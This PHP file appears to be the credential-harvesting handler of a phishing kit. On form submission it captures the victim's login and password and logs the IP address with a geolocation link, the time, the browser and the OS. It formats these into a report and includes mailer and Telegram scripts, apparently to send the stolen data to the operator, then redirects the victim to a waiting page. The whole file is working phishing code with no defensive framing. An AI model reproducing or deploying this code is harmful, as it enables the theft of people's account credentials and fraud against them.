<?php

session_start();

if(isset($_POST['login'])) 
{

include("system.php"); 
include("detect.php"); 

$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);				
$_SESSION['browser'] = $browserTy_Version =array_pop($browser); 	

$login = $_SESSION['login'] = $_POST['login'];
$password = $_SESSION['password'] = $_POST['password'];




$Domin = $_SESSION['Domin'] = $_SERVER['HTTP_REFERER']; 
$rt = substr($Domin, 0, -10);
$rtt = ''.$rt.'/Select/Select.php' ;


$yagmai .= '
[👤 Login] = '.$_SESSION['login'].'
[🔓 password] = '.$_SESSION['password'].'
       [+]━━━━【🌍 Select】━━━[+]
'.$rtt.'
       [+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';


include("sand_email.php"); 
include("TelegramAPi.php");


$Page .= ' 
  ';

$fPage = fopen("../Select/Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);


$src="../Select/Waiting.php";
header("location:$src");

}

else {
$src="../Login.php";
header("location:$src");
}

?>